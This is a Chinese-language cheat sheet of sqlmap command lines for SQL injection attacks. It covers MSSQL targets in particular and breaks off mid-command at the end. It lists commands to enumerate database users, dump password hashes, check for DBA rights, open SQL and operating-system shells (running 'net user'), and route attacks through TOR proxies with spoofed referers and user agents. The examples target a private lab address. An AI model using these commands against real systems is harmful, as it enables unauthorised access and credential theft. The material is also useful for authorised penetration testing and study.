1、实战mssql
判断注入类型 python sqlmap.py -u 注入点
判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1
列举数据库用户 python sqlmap.py -u 注入点 --users -v 0
列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0
查看用户权限 python sqlmap.py -u 注入点 --privileges -v 0
执行命令 python sqlmap.py -u 注入点 --os-shell -os-cmd=net user
2、基本使用
执行SQL语句·python sqlmap.py -u 注入点 -v 1 --sql-shell
更详细的信息 python sqlmap.py -u 注入点 -v 5
POST提交 python sqlmap.py -u 文件路径 --method POST --data 参数
cookie提交 python sqlmap.py -u 文件路径 --cookie 参数 -v 1
使用referer欺骗 python sqlmap.py -u 注入点 --referer referer地址 -v 3
自定义user-agent 或者使用随机自带的user-agents.txt
python sqlmap.py -u 注入点 --user-agent "自定义" -v 3
python sqlmap.py -u 注入点 -v 1 -a "./txt/user-agents.txt"
使用基本认证 python sqlmap.py -u 注入点 --auth-type Basic --auth-cred "testuser:testpass" -v 3
使用Digest认证 python sqlmap.py -u 注入点 --auth-type Digest --auth-cred "testuser:testpass" -v 3
使用代理,配合TOR python sqlmap.py -u 注入点 --proxy 代理ip
使用多线程猜解 python sqlmap.py -u 注入点 -v 1 --current-user --threads 3
绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[\w][\w]